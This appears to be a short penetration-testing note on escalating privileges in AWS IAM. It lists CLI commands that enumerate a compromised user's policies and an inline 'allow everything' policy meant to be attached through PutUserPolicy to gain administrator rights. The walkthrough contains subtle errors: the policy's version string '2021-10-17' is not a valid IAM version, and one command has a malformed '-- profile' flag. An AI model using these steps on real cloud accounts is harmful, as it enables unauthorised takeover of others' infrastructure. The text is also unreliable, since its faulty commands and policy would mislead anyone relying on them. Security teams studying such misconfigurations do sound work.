Privilege Escalation

• Privilege escalation on AWS is based on misconfigurations, if we have more permissions than necessary, its possible to obtain higher privileges.

Study Case

• A user was compromised with the List Policy and Put User Policy permissions, an attacker could leverage this Put User privilege to add an inline administrator to itself, making it administrator of the instance.

Exploitation

1. Getting the IAM user

aws sts get-caller-identity

1. Listing policies attached to an user

aws iam list-attached-user-policies --user-name example_name -- profile example_profile

1. Retrieving informations about an specific policy

aws iam get-policy --policy-arn policy_arn

If there are more than one version of the policy, we can also list them

aws iam list-policy-versions --policy-arn policy_arn

Now we can finally retrieve the contents of the policy

aws iam get-policy-version --policy-arn example_arn --version-id id_example

It's important to use the command above to chech the information about the default policy

1. Escalation

If we have the PutUserPolicy is enabled, we can add an inline administrator policy to our user.

Administrator policy example

{
	"Version": "2021-10-17",
	"Statement" : [
		{
			"Effect":"Allow",
			"Action": [
				"*"
			],
			"Resource":[
				"*"
			]
		}
	]
}